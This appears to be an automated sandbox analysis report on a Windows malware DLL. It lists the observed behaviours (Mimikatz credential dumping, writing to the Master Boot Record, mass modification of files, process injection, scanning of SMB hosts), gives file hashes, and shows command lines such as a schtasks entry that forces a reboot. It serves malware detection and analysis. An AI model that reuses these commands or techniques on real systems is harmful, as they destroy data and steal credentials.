File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECREC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\eula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPLTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\SettingsInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EE55.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2096 wrote to memory of 2084 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 2752 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 2752 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 2752 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 2752 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2084 wrote to memory of 2692 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\EE55.tmp
PID 2084 wrote to memory of 2692 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\EE55.tmp
PID 2084 wrote to memory of 2692 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\EE55.tmp
PID 2084 wrote to memory of 2692 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\EE55.tmp
PID 2752 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2752 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2752 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2752 wrote to memory of 2948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

C:\Users\Admin\AppData\Local\Temp\EE55.tmp

"C:\Users\Admin\AppData\Local\Temp\EE55.tmp" \\.\pipe\{106BDF22-10E0-4B8D-99D2-0E03E1E29D41}

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2084-0-0x00000000001E0000-0x000000000023E000-memory.dmp

memory/2084-8-0x00000000001E0000-0x000000000023E000-memory.dmp

memory/2084-9-0x00000000001E0000-0x000000000023E000-memory.dmp

memory/2084-11-0x00000000001E0000-0x000000000023E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EE55.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2084-26-0x00000000001E0000-0x000000000023E000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20240903-en

Max time kernel

149s

Max time network

148s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6F75.tmp N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RESEND.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDREST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\License Agreements\SynchronizationEula.rtf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DOC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKDEC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\CGMIMP32.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\ACTIVITY.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\NOTE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESN.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SECURE.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\MergeBackup.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\ResourceInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\OOFTMPL.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\SERVWRAP.ASP C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfo.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\CopyResolve.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\DISTLIST.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMES.CFG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6F75.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2792 wrote to memory of 2816 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2816 wrote to memory of 2696 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2696 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2696 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2696 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\cmd.exe
PID 2816 wrote to memory of 2812 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\6F75.tmp
PID 2816 wrote to memory of 2812 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\6F75.tmp
PID 2816 wrote to memory of 2812 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\6F75.tmp
PID 2816 wrote to memory of 2812 N/A C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\6F75.tmp
PID 2696 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2696 wrote to memory of 2628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

C:\Users\Admin\AppData\Local\Temp\6F75.tmp

"C:\Users\Admin\AppData\Local\Temp\6F75.tmp" \\.\pipe\{4DD12103-039B-4F27-9F7E-87D8E431683D}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

Network

Country Destination Domain Proto
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
N/A 10.127.0.8:445 tcp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
